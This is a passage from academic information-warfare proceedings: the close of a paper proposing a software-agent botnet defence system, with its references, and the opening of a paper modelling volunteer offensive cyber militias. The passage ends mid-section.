engineering (Bailey et al. 2009) is a major cause of infection, which defeats many prevention systems<br />

and undermines detection.<br />

One development that will likely impact the malware threatscape is the arrival of broadband access to<br />

Africa. For an analysis of the impact see (Jansen van Vuuren, Phahlamohlaka & Brazzoli 2010). It is<br />

estimated that there are 100 million computers available for botnet herders to use (Carr, Shepherd<br />

2010). However, we are of the opinion that, due to a range of socio-economic factors, Africa may be a<br />

source of volunteers for botnets similar to Israel’s Defenderhosting.<br />

2. Malware<br />

Malware is a term encompassing all the different categories of malicious software, which include<br />

amongst others Trojans, viruses, worms and spyware. The advancements in technology and<br />

especially the ability to be 24/7 connected to people and resources across the globe have hugely<br />

increased the volumes of malware circulating global networks. This is evident from the large amount<br />

of spam constantly and increasingly being delivered to mailboxes. According to Damballa (2009) the<br />

success of spamming botnets has led to the commoditization of spam in which volume has become<br />

the primary means to generate cash.<br />

Malware are created and initiated in countries across the globe with different websites listing different<br />

statistics regarding the country of origin, on a weekly basis. For example the USA, China and Russia<br />

are being listed by The Spamhaus Project (http://www.spamhaus.org/statistics/countries.lasso) as the<br />

countries where the largest percentage of spam are created and exported, while M86 Security Labs<br />

(http://www.m86security.com/labs/spam_statistics.asp) list the US, India and Brazil as the recent<br />

largest contributors.<br />

Creating or obtaining malware has become relatively easy with the evolution of technology and<br />

especially the commoditization of malicious code. Different types of malware can be obtained via<br />

malware kits or through specialists offering their services to design and develop unique pieces of<br />

malicious code for different platforms or forums. Some of the more famous examples include<br />

Webattacker, Smeg, Fragus, Zeus and Adpack.<br />

The evolution and spread of malware is directly related to the number of entities being connected,<br />

with the increase in not only the amount but also the different types of malware being evident today.<br />

With the increase in malware also came constant research and development to combat these<br />

unwanted software, which in turn leads to the creators of malware to be more innovative. According to<br />

Chiang & Lloyd (2007), the traditional method of using the Internet Relay Chat (IRC) protocol for<br />

command and control made way for new methods of hiding the command and control communication<br />

such as HTTP based communications, encryption and peer-to-peer networks as it became easier to<br />

detect and block IRC traffic. This became evident in the creation and re-invention of botnets such as<br />

Agobot (Wang, 2009), Rustock (Chiang & Lloyd, 2007) and Conficker (Porras, 2009).<br />

The impact of the advances, commoditization and the DIY culture for the creation of malware on<br />

global networks and especially global security is huge. Malware is being used to amongst others steal<br />

personal data, conduct espionage, harm government and business operations, deny user access to<br />

information and services and according to the report conducted by the International Organization for<br />

Economic co-operation and Development (OECD, 2007) poses a serious threat to the Internet<br />

economy. Securing networks is not only depended on security vendors and security specialists but<br />

also rely on normal users of the networks to protect their stations. The increasing use of social<br />

299


Evan Dembskey and Elmarie Biermann<br />

networks such as Facebook, Twitter and MySpace as well as mobile generation provide increasing<br />

grounds for malware to access contact details and personal information.<br />

It is vital for the Internet economy that robust and resilient counter systems needs to be constantly in<br />

operation, while adapting to changing conditions.<br />

3. Current malware detection techniques<br />

The first hint of a malware infection may be the receipt of an email stating that a system appears to be<br />

infected and has abused a different system; the convention is that administrative contacts of some<br />

form are listed at global regional information registry sites such as AfriNIC, ARIN, APNIC, LAPNIC<br />

and RIPE to assist in communication. The abuse may take the form of spam, scanning activity, DDoS<br />

attacks, phishing or harassment ((Schiller, Binkley & Harley 2007).<br />

It is a poor security method indeed that relies on informants only. A better approach is the use of<br />

network-monitoring tools such as wireshark or tcpdump as malware activity results in data that can be<br />

analysed. Examples of prevalent data types are (Bailey et al. 2009):<br />

DNS Data: Data regarding name resolution can be obtained by mirroring data to and from DNS<br />

servers and can be used to detect both botnet attack behaviour.<br />

Netflow Data: Netflow data represents information gathered from the network by sampling traffic<br />

flows and obtaining information regarding source and destination IP addresses and port numbers.<br />

This is not available on all networks.<br />

Packet Tap Data: Packet tap data, while providing a more fine grained view than netflow but is<br />

generally more costly in terms of hardware and computation. Simple encryption reduces this<br />

visibility back to the same order as netflow.<br />

Address Allocation Data: Knowing where hosts and users are in the network can be a powerful<br />

tool for identifying malware reconnaissance behaviour and rapid attribution.<br />

Honeypot Data: Placed on a network with the express intention of them being turned into botnet<br />

members, honeypots can be a powerful tool for gaining insight into botnet means and motives.<br />

Host Data: Host level data, from OS and application configurations, logs and user activity<br />

provides a wealth of security information and can avoid the visibility issues with encrypted data.<br />

An even better method is an Intrusion Detection System (IDS). An IDS can either be host-based<br />

(HIDS) or network-based (NIDS). Both of these are further categorised by the type of algorithm used,<br />

namely anomaly- and signature-based detection. Anomaly–based techniques develop an<br />

understanding of what normal behaviour is on a system, and reports any deviation. Signature-based<br />

techniques use representations of known malware to decide if software is indeed malicious. A<br />

specialised form of anomaly-based detection, called specification-based detection makes use of a<br />

rule set to decide if software is malicious. Violation of these rules indicates possible malicious<br />

software.<br />

A NIDS sees protected hosts in terms of the external interfaces to the rest of the network, rather than<br />

as a single system, and gets most of its results by network packet analysis. Much of the data used is<br />

the same as discussed using the manual methods above. A HIDS focuses on individual systems.<br />

That doesn’t mean each host runs its own HIDS application, they are generally administered centrally,<br />

rather it means that the HIDS monitors activity on a protected host. It can pick up evidence of<br />

breaches that have evaded outward-facing NIDS and firewall systems or have been introduced by<br />

other means, such internal attacks, direct tampering from internal users and the introduction of<br />

malicious code from removable media (Schiller, Binkley & Harley 2007).<br />

Malware can also be detected forensically. Though this occurs after damage has been incurred, it is<br />

important for a number of reasons including legal purposes. Forensic aims can include identification,<br />

preservation, analysis, and presentation of evidence. Digital investigations that are or might be<br />

presented in a court of law must meet the applicable standards of admissible evidence. Admissibility<br />

is a concept that varies according to jurisdiction (Schiller, Binkley & Harley 2007).<br />

Two techniques that are essentially forensic in nature are darknets and honeynets, though the<br />

knowledge gained from their use helps to prevent, detect and remove botnets. A darknet is a closed<br />

private network used for file sharing. However, the term has been extended in the security sphere to<br />

apply to IP address space that is routed but which no active hosts and therefore no legitimate traffic.<br />

300


Evan Dembskey and Elmarie Biermann<br />

Darknets are most useful as global resource for sites and groups working against botnets on an<br />

Internet-wide basis (Schiller, Binkley & Harley 2007). A honeypot is a decoy system set up to attract<br />

attackers and study their methods and capabilities. A honeynet is usually defined as consisting of a<br />

number of honeypots in a network, offering the attacker real systems, applications, and services to<br />

work on and monitored transparently by a Layer 2 bridging device (honeywall). A static honeynet can<br />

quickly be spotted and blacklisted by attackers, but distributed honeynets attempt to address that<br />

issue and are likely to capture richer, more varied data (Schiller, Binkley & Harley 2007). In contrast to<br />

honeynets, darknets do not advertise themselves.<br />

Botnets, the malware we are interested in, are difficult to combat for the following reasons (Bailey et<br />

al. 2009):<br />

All aspects of the botnet’s life-cycle are all evolving constantly.<br />

Each detection technique comes with its own set of tradeoffs with respect to false positives and<br />

false negatives.<br />

Different types of networks approach the botnet problem with differing goals, with different<br />

visibility into the botnet behaviours, and different sources of data with which to uncover those<br />

behaviours.<br />

A successful solution for combating botnets will need to cope with each of these realities and their<br />

complex interactions with each other.<br />

4. Software agents<br />

A software agent is a program that autonomously acquires, manipulates, distributes and maintains<br />

information on behalf of some entity. We reject the trend of labeling software utilities such as<br />

aggregators and download managers as SA; we base our definition on the properties of the software.<br />

The literature defines a large number of agent properties. Not all properties are found in all agents,<br />

but an in order to be termed Agent software must satisfy some minimum set of these properties. Bigus<br />

and Bigus (Bigus, Bigus 2001) suggest that these are autonomy, intelligence and mobility. These<br />

properties are defined as follows:<br />

Autonomy - The autonomous agent exercises control over its own actions and has some degree<br />

of control over its internal state. It displays judgment when faced with a situation requiring a<br />

decision, and makes a decision without direct external intervention.<br />

Intelligence - This does not imply self-awareness, but the ability to behave rationally and pursue a<br />

goal in a logical and rational manner. Intelligence varies between simple coded logic and complex<br />

AI-based methods such as inferencing and learning.<br />

Mobility- Mobility is the degree to which agents move through the network. Some may be static<br />

while others may migrate as the need arises. The decision to move should be made by the agent<br />

(Murch, Johnson 1999), thus ensuring the agent has the property of autonomy.<br />

From these properties we can judge that SA have potential applications in dealing with tasks that are<br />

ill-defined or less structured. It is also apparent that SA interact with their task environments locally;<br />

the implication of this is that the same agent can exhibit different behaviour in different environments<br />

(Liu 2001). Padgham & Winikoff ((Padgham, Winikoff 2004)) provide a list of reasons why agents are<br />

useful, including loose coupling, decentralisation, persistence, better functioning in open and complex<br />

systems and reactiveness as well as proactivness. The use of SA to combat botnets is not<br />

unprecedented. It had already been suggested that AF.MIL should be purposely made part of a<br />

botnet ((Williams 2008)). Some researchers see botnets as types of SA ((Bigus, Bigus 2001)). Other<br />

researchers ((Stytz, Banks 2008)) have begun to work on the problem of implementing such an<br />

approach.<br />

5. Proposed system<br />

Vulnerabilities are introduced in software deliberately or accidently during development, or via<br />

software or configuration changes during operation. Botnets are not typically introduced during<br />

software development and thus require later introduction, and usually unintentionally. Possible vectors<br />

of infection are viruses, worms and Trojans. These may be introduced via email, download, drive-by<br />

download, network worm or some external storage device. According to (Cruz 2008) the majority of<br />

infections occur due to downloads (53%) and infection via other malware (43%). Email and<br />

removable drives account for 22% of infections. Instant Messaging, vulnerabilities, P2P, iFrame<br />

301


Evan Dembskey and Elmarie Biermann<br />

compromises, other infected files and other vectors account for 27% (the total is higher than 100%<br />

because some malware uses multiple vectors). The vast majority of infections are as a result of<br />

downloads, suggesting this should be the primary threat to mitigate. This is the attitude adopted in this<br />

research, with the recognition that this could change at any time, temporarily or permanently, thus<br />

necessitating a system that is flexible enough to cope with this change.<br />

Several methods to detect and deter botnets have been proposed such as incorporating data mining<br />

techniques as well as incorporating methods to detect communication between the bot and the<br />

master (Massud et al., 2008).<br />

Massive multiplayer online role playing games (MMORPG) battle to differentiate between human and<br />

bot players. Yampolskiy & Govindaraju (2008) studied running processes and network traffic as a<br />

method to distinguish between humans and bots. Chen et al (2009) identified bots in MMORPG<br />

through traffic analysis. They showed amongst others that traffic is distinguishable by (1) the regularity<br />

in the release time of the client command; (2) the trend and magnitude of traffic burstiness in multiple<br />

time scales; and (3) the sensitivity to different network connections. Thawonmas et al (2008), conduct<br />

behaviour analysis within this gaming environment and implement methods focusing on resource<br />

gathering and trading behavior. Traffic classification is also proposed and done by Li et al (2009), with<br />

Lu et al (2009) proposing a hierarchical framework to automatically discover botnets. They first<br />

classify network traffic into different application communities by using payload signatures.<br />

Virtual bots are also introduced as a method to create uncertainties in the botnet market. Li et al<br />

(2008) followed a different perspective by looking at botnet disabling mechanisms from an economic<br />

perspective. This links to methods looking at collective behavior of bots, i.e. studying the focus and<br />

deriving solutions from there (Pathak et al., 2009; Stone-Gross et al., 2009). Xie et al (2008)<br />

characterize botnets by leveraging spam payload and spam server traffic properties. They identify<br />

botnet hosts by generating botnet spam signatures from emails. Ramachandran. & Feamster (2008)<br />

studied the network level behavior of spammers. They identified specific characteristics, such that<br />

spam is being sent from a few regions of IP address space. They also propose that developing<br />

algorithms to identify botnet memberships need to be based on network level properties. Staying on<br />

the network level, Villamarín-Salomón & Brustoloni (2009) propose a Bayesian approach for detecting<br />

bots based on the similarity of their DNS traffic to that of known bots.<br />

A detailed look into the solutions summarized above, led us to propose a design incorporating the use<br />

of intelligent SA as a counter to botnets. Our design incorporates the different aspects and required<br />

characteristics as detailed in literature. Our design is also a next step in detailing our proposed<br />

framework (Dembskey, Biermann 2008) As stated in (Dembskey, Biermann 2008), we propose three<br />

layers, namely IDS, Observer and Communication.<br />

Figure 1: Three layers<br />

IDS<br />

Observer<br />

Communication Layer<br />

302


Evan Dembskey and Elmarie Biermann<br />

Using these layers as our starting point we introduce sub-layers and descriptions as depicted in<br />

Figure 2. We only focus on the Observer and IDS layers.<br />

The observer layer consists of five sub-layers all focusing on gathering information:<br />

Collective Behaviour<br />

Communication Analysis<br />

Resource Gathering<br />

Spreading & Growth Patterns<br />

Network Traffic Analysis<br />

Each of these sub-layers focuses on particular aspects of gathering information through observation.<br />

This observation is conducted through a focused software agent network.<br />

Within network traffic analysis, intensive signature analyses are conducted in order to provide data to<br />

the IDS layer. From these analyses, information on spreading and growth patterns is gathered and<br />

models proposed. Resource gathering focused on observing specifics such as bandwidth depletion<br />

and resource utilizations. Communication analysis refers to the communications taking place between<br />

bots and masters and the analysis thereof. This will assist in determining the collective behaviour or<br />

focus of the botnet as well as assist in detailing the economic focus.<br />

The information gathered within the observer layer is used as input to the IDS layer. The IDS layer will<br />

function as both a HIDS and a NIDS; that is, it will have operational agents on hosts and servers. The<br />

IDS layer includes the following:<br />

Infiltrate and disable<br />

Spawn Intelligent Software Agent Network<br />

Classification<br />

The information gathered within the observer level are use to classify the botnet and according to the<br />

classification an intelligent software agent network is spawned to infiltrate and ultimately disable the<br />

botnet.<br />

Agentification of email client and server software, host and server monitoring software, host and<br />

server firewall and AV software, network monitoring software, user monitoring software is required, or<br />

at least, the capability to interface with these applications.<br />

It is anticipated that the crowd sourcing component will function on two layers. Firstly, SA from<br />

different organizations will communicate threats amongst themselves with minimal supervision.<br />

Secondly, information will be sourced from human beings. Both open and proprietary sources should<br />

be used, but the following two points must be kept in mind. The use of proprietary systems will have a<br />

cost implication and the use of that data may not legally be allowed to propagate through the entire<br />

SA system. Secondly, the possibility of attack vectors being introduced is a real concern – if crowd<br />

sourcing results in false positives through the means of concerted and purposeful false reporting, then<br />

a DoS attack may occur, with the system’s SA falsely identify normal activity as malicious and halt it.<br />

A robust and up-to-date system that can share data on the safety of web sites and software will<br />

mitigate the risk from the primary sources of infection discussed above. The CYBEX (X.1500) is in the<br />

opinion of the authors the correct path to follow to implement this system.<br />

As part of this research we will implement and test a model of the proposed system against a variety<br />

of botnets. The model will not be comprehensive and will focus on mitigating threats launched via<br />

drive-by downloads and locally installed software. The network of NIDS and HIDS with the crowd<br />

sourcing component will be implemented.<br />

We must also consider the impact of virtualization and the trend towards cloud and grid computing,<br />

which we think will continue. It is also not the intention that this system is entirely automated, as the<br />

effect of systemic failure may be worse than anticipated and human intervention may serve to mitigate<br />

this risk.<br />

303


Evan Dembskey and Elmarie Biermann<br />

In summary, we propose to model and implement a proof-of-concept of an integrated SA botnet<br />

defense system. Some challenges of developing such a system are its complexity and human privacy<br />

requirements and laws. Rather than be daunted by this, we instead believe that the effort will be well<br />

rewarded and will identify future areas of research.<br />

IDS Level<br />

Observer Level<br />

Figure 2: Observer and IDS layers<br />

References<br />

Infiltrate and Disable<br />

Spawn Intelligent Software Agent Network<br />

Classification<br />

Collective Behavior<br />

Communication Analysis<br />

Resource Gathering<br />

Spreading & Growth Patterns<br />

Network Traffic Analysis<br />

Bailey, M., Cooke, E., Jahanian, F., Xu, Y. & Karir, M. 2009, "A survey of botnet technology and defenses",<br />

Proceedings of the 2009 Cybersecurity Applications & Technology <strong>Conference</strong> for Homeland Security-<br />

Volume 00, IEEE Computer Society, pp. 299.<br />

Bigus, J.P. & Bigus, J. 2001, Constructing intelligent agents using Java, Wiley New York.<br />

Carr, J. & Shepherd, L. 2010, Inside cyber warfare, 1st edn, O'Reilly Media, Inc., Sebastopol, Calif.<br />

304


Evan Dembskey and Elmarie Biermann<br />

Chen, K., Jiang, J., Huang, P., Chu, H., Lei, C. & Chen, W. 2009. Identifying MMORPG Bots: A Traffic Analysis<br />

Approach. EURASIP Journal on Advances in signal Processing. Volume 2009, Article 3.<br />

Chiang, K. & Lloyd, L. 2007. A Case Study of the Rustock Rootkit and Spam Bot. Proceedings of the First<br />

Workshop on Hot Topics in Understanding Botnets, Cambridge, MA.<br />

Cruz, M. 2008, , Most Abused Infection Vector. Available: http://blog.trendmicro.com/most-abused-infectionvector/<br />

[2010, 9/27/2010].<br />

Damballa Inc. 2009. Upate on the Enemy: A deconstruction of who profits from botnets. Available:<br />

http://www.damballa.com/downloads/d_pubs/WP%20Update%20on%20the%20Enemy%20(2009-05-<br />

13).pdf<br />

Dembskey, E. & Biermann, E. 2008, "Software agent framework for computer network operations in IW",<br />

Proceedings of the 3rd International <strong>Conference</strong> On Information Warfare And Security, ed. L. Armistead,<br />

ACL, pp. 127.<br />

Denning, P.J. & Denning, D.E. 2010, "Discussing cyber attack", Commun.ACM, vol. 53, no. 9, pp. 29-31.<br />

Dunham, K. & Melnick, J. 2009, Malicious Bots: An Inside Look Into the Cyber-Criminal Underground of the<br />

Internet, Auerbach Publications.<br />

Jansen van Vuuren, J., Phahlamohlaka, J. & Brazzoli, M. 2010, "The Impact of the Increase in Broadband<br />

Access on South African National Security and the Average citizen", Proceedings of the 5th International<br />

<strong>Conference</strong> on Information Warfare and Security, ed. L. Armistead, ACL , pp. 171.<br />

Knapp, K.J. & Boulton, W.R. 2008, "Ten Information Warfare Trends" in Cyber Warfare and Cyber Terrorism,<br />

eds. Kenneth Knapp & William Boulton, IGI Global, US; Hershey, PA, pp. 17-25.<br />

Li, Z., Liao, Q & Striegel, A. 2008. Botnet Economics: Uncertainty Matters. Workshop on the Economics of<br />

Information Security (WEIS 2008), London, England.<br />

Li, Z., Goyal, A., Chen, Y. & Paxson, V. 2009. Automating Analysis of Large-Scale Botnet Probing Events.<br />

Proceedings of the 4 th International Symposium on Information, Computer and Communications Security.<br />

Sydney, Australia.<br />

Liu, J. 2001, Autonomous agents and multi-agent systems: explorations in learning, self-organization, and<br />

adaptive computation, World Scientific.<br />

Liu, J., Xiao, Y., Ghaboosi, K., Deng, H. & Zhang, J. 2009. Botnet: Classification, Attacks, Detection, Tracing and<br />

Preventive measures. EURASIP Journal on Wireless Communications and Networking, Volume 2009.<br />

Hindawi Publishing Corporation.<br />

Lu, W. Tavallaee, M. & Ghorbani, AA. 2009. Automatic Discovery of Botnet Communities on Large-Scale<br />

Communication Networks. Proceedings of the 4 th International Symposium on Information, Computer and<br />

Communications Security. Sydney, Australia.<br />

Masud, MM., Gao, J., Khan, L., Han, J. & Thuraisingham, B. 2008. Peer to Peer Botnet Detection for Cyber-<br />

Security: A Data Mining Approach. In: Proceedings of the 4 th annual workshop on Cyber security and<br />

information intelligence research: developing strategies to meet the cyber security and information<br />

intelligence challenges ahead. Oak ridge, Tennessee.<br />

Microsoft, 2010. Download details: Microsoft Security Intelligence Report volume 8 (July - December 2009).<br />

Available: http://www.microsoft.com/downloads/details.aspx?FamilyID=2c4938a0-4d64-4c65-b951-<br />

754f4d1af0b5&displaylang=en [7/21/2010].<br />

Murch, R. & Johnson, T. 1999, Intelligent software agents, prentice Hall PTR.<br />

National Research Council (U.S.). Committee on the Role of Information Technology in Responding to Terrorism,<br />

Hennessy, J.L., Patterson, D.A., Lin, H. & National Academies Press 2003, Information technology for<br />

counterterrorism: immediate actions and future possibilities, National Academies Press, Washington, D.C.<br />

OECD (Organization for Economic Co-operation and Development). 2007. Malicious Software (Malware): A<br />

Security Threat to the Internet Community. Ministerial Background Report [Online]. Available:<br />

http://www.oecd.org/dataoecd/53/34/40724457.pdf<br />

Ollmann, G. 2010, "Asymmetrical Warfare: Challenges and Strategies for Countering Botnets", The 5th<br />

International <strong>Conference</strong> on Information-Warfare & SecurityACI, Reading, England, pp. 507.<br />

Oram, A. & Viega, J. 2009, Beautiful security, 1st edn, O'Reilly, Sebastopol, CA.<br />

Padgham, L. & Winikoff, M. 2004, Developing intelligent agent systems: a practical guide, Wiley.<br />

Pathak, A., Qian, F., Hu, Y.C., Mao, ZM. & Ranjan, S. 2009. Botnet Spam Campaigns Can Be Long Lasting:<br />

Evidence, Implications, and Analysis. Proceedings of the 11 th International Joint <strong>Conference</strong> on<br />

Measurement and Modeling of Computer Systems. SIGMETRICS / Performance'09, June 15-19, 2009,<br />

Seattle, WA.<br />

Porras, P. 2009. Reflections on Conficker: An insider's view of the analysis and implications of the Conficker<br />

conundrum. CACM 52 (10). October.<br />

Prince, B. 2010,, Russian Cybercrime: Geeks, Not Gangsters | eWEEK Europe UK. Available:<br />

http://www.eweekeurope.co.uk/knowledge/russian-cybercrime-geeks-not-gangsters-9182/2 [2010,<br />

8/30/2010].<br />

Ramachandran, A. & Feamster, N. 2006. Understanding the Network Level Behavior of Spammers. Proceedings<br />

of the 2006 <strong>Conference</strong> on Applications, Technologies, Architectures and Protocols for Computer<br />

Communications, SIGCOMM’06, September 11-15, 2006, Pisa, Italy.<br />

Schiller, C.A., Binkley, J. & Harley, D. 2007, Botnets: the killer web app, Syngress Media Inc.<br />

Smith, G. 1998,, Issues in S and T, Fall 1998, An Electronic Pearl Harbor? Not Likely. Available:<br />

http://www.issues.org/15.1/smith.htm [2010, 8/16/2010].<br />

305


Evan Dembskey and Elmarie Biermann<br />

Stone-Gross, B., Cova, M., Cavallaro, L., Gilbert, B. & Szydlowski, M. 2009. Your Botnet is My Botnet: Analysis<br />

of a Botnet Takeover. Proceedings of the 16 th ACM <strong>Conference</strong> on Computer and Communications<br />

Security. CCS’09, November 9–13, 2009, Chicago, Illinois, USA.<br />

Stytz, M.R. & Banks, S.B. 2008, Toward Intelligent Agents For Detecting Cyberattacks<br />

Thawonmas, R. Kashifuji, Y. & Chen, K. 2008. Detection of MMORPG Bots Based on Behavior Analysis.<br />

Proceedings of the 2008 International <strong>Conference</strong> on Advances in Computer Entertainment Technology.<br />

Yokohama, Japan.<br />

Villamarín-Salomón, R. & Brustoloni, JC. 2009. Bayesian Bot Detection Based on DNS Traffic Similarity.<br />

Proceedings of the 2009 ACM symposium on Applied Computing, SAC’09, March 8-12, 2009, Honolulu,<br />

Hawaii, U.S.A.<br />

Wang, Y., Gu, D., Xu, J. & Du, H. 2009. Hacking Risk Analysis of Web Trojan in Electric Power System. In:<br />

Proceedings of the International <strong>Conference</strong> on Web Information Systems and Mining. Shanghai, China.<br />

Williams, C.W. 2008,, Carpet bombing in cyberspace - May 2008 - Armed Forces Journal - Military Strategy,<br />

Global Defense Strategy. Available: http://www.armedforcesjournal.com/2008/05/3375884 [2010,<br />

7/20/2010].<br />

Yampolskiy, RV. & Govindaraju, V. 2008. Embedded Non-interactive Continuous Bot Detection. ACM Computers<br />

in Entertainment, Vol. 5, No. 4, Article 7. Publication Date: March 2008.<br />

Xie, Y., Yu, F., Achan, K., Panigrahy, R., Hulten, G. & Osipkov, I. 2008. Spamming Botnets: Signatures and<br />

Characteristics. Proceedings of th 2008 <strong>Conference</strong> on Applications, Technologies, Architectures and<br />

Protocols for Computer Communications,SIGCOMM’08, August 17–22, 2008, Seattle, Washington.<br />

306


Theoretical Offensive Cyber Militia Models<br />

Rain Ottis<br />

Cooperative Cyber Defence Centre of Excellence, Tallinn, Estonia<br />

rain.ottis@ccdcoe.org<br />

Abstract. Volunteer based non-state actors have played an important part in many international cyber conflicts of<br />

the past two decades. In order to better understand this threat I describe three theoretical models for volunteer<br />

based offensive cyber militias: the Forum, the Cell and the Hierarchy. The Forum is an ad-hoc cyber militia form<br />

that is organized around a central communications platform, where the members share information and tools<br />

necessary to carry out cyber attacks against their chosen adversary. The Cell model refers to hacker cells, which<br />

engage in politically motivated hacking over extended periods of time. The Hierarchy refers to the traditional<br />

hierarchical model, which may be encountered in government sponsored volunteer organizations, as well as in<br />

cohesive self-organized non-state actors. For each model, I give an example and describe the model’s attributes,<br />

strengths and weaknesses using qualitative analysis. The models are based on expert opinion on different types<br />

of cyber militias that have been seen in cyber conflicts. These theoretical models provide a framework for<br />

categorizing volunteer based offensive cyber militias of non-trivial size.<br />

Keywords: cyber conflict, cyber militia, cyber attack, patriotic hacking, on-line communities<br />

1. Introduction<br />

The widespread application of Internet services has given rise to a new contested space, where<br />

people with conflicting ideals or values strive to succeed, sometimes by attacking the systems and<br />

services of the other side. It is interesting to note that in most public cases of cyber conflict the<br />

offensive side is not identified as a state actor, at least not officially. Instead, it often looks like citizens<br />

take part in hactivist campaigns or patriotic hacking on their own, volunteering for the cyber front.<br />

Cases like the 2007 cyber attacks against Estonia are a good example where an informal non-state<br />

cyber militia has become a threat to national security. In order to understand the threat posed by<br />

these volunteer cyber militias I provide three models of how such groups can be organized and<br />

analyze the strengths and weaknesses of each.<br />

The three models considered are the Forum, the Cell and the Hierarchy. The models are applicable to<br />

groups of non-trivial size, which require internal assignment of responsibilities and authority.<br />

1.1 Method and limitations<br />

In this paper I use theoretical qualitative analysis in order to describe the attributes, strengths and<br />

weaknesses of three offensively oriented cyber militia models. I have chosen the three plausible<br />

models based on what can be observed in recent cyber conflicts. The term model refers to an abstract<br />

description of relationships between members of the cyber militia, including command, control and<br />

mentoring relationships, as well as the operating principles of the militia.<br />

Note, however, that the description of the models is based on theoretical reasoning and expert<br />

opinion. It offers abstract theoretical models in an ideal setting. There may not be a full match to any<br />

of them in reality or in the examples provided. It is more likely to see either combinations of different<br />

models or models that do not match the description in full. On the other hand, the models should<br />

serve as useful frameworks for analyzing volunteer groups in the current and coming cyber conflicts.<br />

In preparing this work, I communicated with and received feedback from a number of recognized<br />

experts in the field of cyber conflict research. I wish to thank them all for providing comments on my<br />

proposed models: Prof Dorothy Denning (Naval Postgraduate School), Dr Jose Nazario (Arbor<br />

Networks), Prof Samuel Liles (Purdue University Calumet), Mr Jeffrey Carr (Greylogic) and Mr<br />

Kenneth Geers (Cooperative Cyber Defence Centre of Excellence).<br />

2. The forum<br />

The global spread of the Internet allows people to connect easily and form „cyber tribes“, which can<br />

range from benign hobby groups to antagonistic ad-hoc cyber militias. (Williams 2007, Ottis 2008,<br />

Carr 2009, Nazario 2009, Denning 2010) In the case of an ad-hoc cyber militia, the Forum unites likeminded<br />

people who are “willing and able to use cyber attacks in order to achieve a political goal.“<br />

307


Rain Ottis<br />

(Ottis 2010b) It serves as a command and control platform where more active members can post<br />

motivational materials, attack instructions, attack tools, etc. (Denning 2010)<br />

This particular model, as well as the strengths and weaknesses covered in this section, are based on<br />

(Ottis 2010b). A good example of this model in recent cyber conflicts is the stopgeorgia.ru forum<br />

during the Russia-Georgia war in 2008 (Carr 2009).<br />

2.1 Attributes<br />

The Forum is an on-line meeting place for people who are interested in a particular subject. I use<br />

Forum as a conceptual term referring to the people who interact in the on-line meeting place. The<br />

technical implementation of the meeting place could take many different forms: web forum, Internet<br />

Relay Chat channel, social network subgroup, etc. It is important that the Forum is accessible over<br />

Internet and preferably easy to find. The latter condition is useful for recruiting new members and<br />

providing visibility to the agenda of the group.<br />

The Forum mobilizes in response to an event that is important to the members. While there can be a<br />

core group of people who remain actively involved over extended periods of time, the membership<br />

can be expected to surge in size when the underlying issue becomes “hot“. Basically, the Forum is<br />

like a flash mob that performs cyber attacks instead of actions on the streets. As such, the Forum is<br />

more ad-hoc than permanent, because it is likely to disband once the underlying event is settled.<br />

The membership of the Forum forms a loose network centered on the communications platform,<br />

where few, if any, people know each other in real life and the entire membership is not known to any<br />

single person (Ottis 2010b). Most participate anonymously, either providing an alias or by remaining<br />

passive on the communication platform. In general, the Forum is an informal group, although specific<br />

roles can be assumed by individual members. For example, there could be trainers, malware<br />

providers, campaign planners, etc. (Ottis 2010b) Some of the Forum members may also be active in<br />

cyber crime. In that case, they can contribute resources such as malware or use of a botnet to the<br />

Forum.<br />

The membership is diverse, in terms of skills, resources and location. While there seems to be<br />

evidence that a lot of the individuals engaged in such activities are relatively unskilled in cyber attack<br />

techniques (Carr 2009), when supplemented with a few more experienced members the group can be<br />

much more effective and dangerous (Ottis 2010a).<br />

Since most of the membership remains anonymous and often passive on the communications<br />

platform, the leadership roles will be assumed by those who are active in communicating their intent,<br />

plans and expertise. (Denning 2010) However, this still does not allow for strong command and<br />

control, as each member can decide what, if any, action to take.<br />

2.2 Strengths<br />

One of the most important strengths of a loose network is that it can form very quickly. Following an<br />

escalation in the underlying issue, all it takes is a rallying cry on the Internet and within hours or even<br />

minutes the volunteers can gather around a communications platform, share attack instructions, pick<br />

targets and start performing cyber attacks.<br />

As long as there is no need for tightly controlled operations, in terms of timing, resource use and<br />

targeting, there is very little need for management. The network is also easily scalable, as anyone can<br />

join and there is no lengthy vetting procedure.<br />

The diversity of the membership means that it is very difficult for the defenders to analyze and counter<br />

the attacks. The source addresses are likely distributed globally (black listing will be inefficient) and<br />

the different skills and resources ensure heterogeneous attack traffic (no easy patterns). In addition,<br />

experienced attackers can use this to conceal precision strikes against critical services and systems.<br />

While it may seem that neutralizing the communications platform (via law enforcement action, cyber<br />

attack or otherwise) is an easy way to neutralize the militia, this may not be the case. The militia can<br />

easily regroup at a different communications platform in a different jurisdiction. Attacking the Forum<br />

directly may actually increase the motivation of the members. (Ottis 2010b)<br />

308


Rain Ottis<br />

Last, but not least, it is very difficult to attribute these attacks to a state, as they can (seem to) be a<br />

true (global) grass roots campaign, even if there is some form of state sponsorship. Some states may<br />

take advantage of this fact by allowing such activity to continue in their jurisdiction, blaming legal<br />

obstacles or lack of capability for their inactivity. It is also possible for government operatives to<br />

“create” a “grass roots” Forum movement in support of the government agenda. (Ottis 2009)<br />

2.3 Weaknesses<br />

A clear weakness of this model is the difficulty to command and control the Forum. Membership is not<br />

formalized and often it is even not visible on the communication platform, because passive readers<br />

can just take ideas from there and execute the attacks on their own. This uncoordinated approach can<br />

seriously hamper the effectiveness of the group as a whole. It may also lead to uncontrolled<br />

expansion of conflict, when members unilaterally attack third parties on behalf of the Forum.<br />

A problem with the loose network is that it is often populated with people who do not have experience<br />

with cyber attacks. Therefore, their options are limited to primitive manual attacks or preconfigured<br />

automated attacks using attack kits or malware. (Ottis 2010a) They are highly reliant on instructions<br />

and tools from more experienced members of the Forum.<br />

The Forum is also prone to infiltration, as it must rely on relatively easily accessible communication<br />

channels. If the communication point is hidden, the group will have difficulties in recruiting new<br />

members. The assumption is, therefore, that the communication point can be easily found by both<br />

potential recruits, as well as infiltrators. Since there is no easy way to vet the incoming members,<br />

infiltration should be relatively simple.<br />

Another potential weakness of the Forum model is the presumption of anonymity. If the membership<br />

can be infiltrated and convinced that their anonymity is not guaranteed, they will be less likely to<br />

participate in the cyber militia. Options for achieving this can include “exposing” the “identities” of the<br />

infiltrators, arranging meetings in real life, offering tools that have a phone-home functionality to the<br />

members, etc. Note that some of these options may be illegal, depending on the circumstances. (Ottis<br />

2010b)<br />

3. The cell<br />

Another model for a volunteer cyber force that has been seen is a hacker cell. In this case, the<br />

